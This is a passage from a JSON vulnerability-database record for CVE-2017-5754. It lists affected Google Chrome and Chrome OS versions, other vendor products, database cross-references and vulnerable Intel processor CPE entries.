"scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.459.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.541.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.221" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.333.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.779.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.307" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.127" }, { "model": "chrome beta mac", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1027" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.396.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.428.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1035.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.460.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1053" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.455.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1014.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.449.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.142" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.620.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.497.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.576.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1015.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.2" }, { "model": "vsphere integrated containers", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "1.3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.148" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.99" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.751.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.636.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.313" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.64" }, { "model": "windows for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.456.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.12" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.47" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.831.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.550.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.583.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.595.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1009" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.108" }, { "model": "proliant dl385 gen10 server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.866.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.34" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.128" }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.653.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1656.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.35" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.713.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.643.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.228" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.5" }, { "model": "bactec", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "9120/92400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.504.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.68" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1016070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.359.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.565.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.567.0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37586" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.238" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.656.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1011" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1033.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.788.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.691.0" }, { "model": "pixel", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "nexus player", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6" } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "BID", "id": "102378" }, { "db": "BID", "id": "106128" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3710:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3010:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3050:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2930:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2920:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2808:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2807:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3060:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1900:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3295rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3235rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3308:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3338:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3808:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2738:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2718:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2730:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3510:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2940:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2815:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2810:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3455:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3355:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3405:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3265rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3795:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3785:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3815:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3805:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3758:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3958:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2758:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2338:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2308:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2900:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 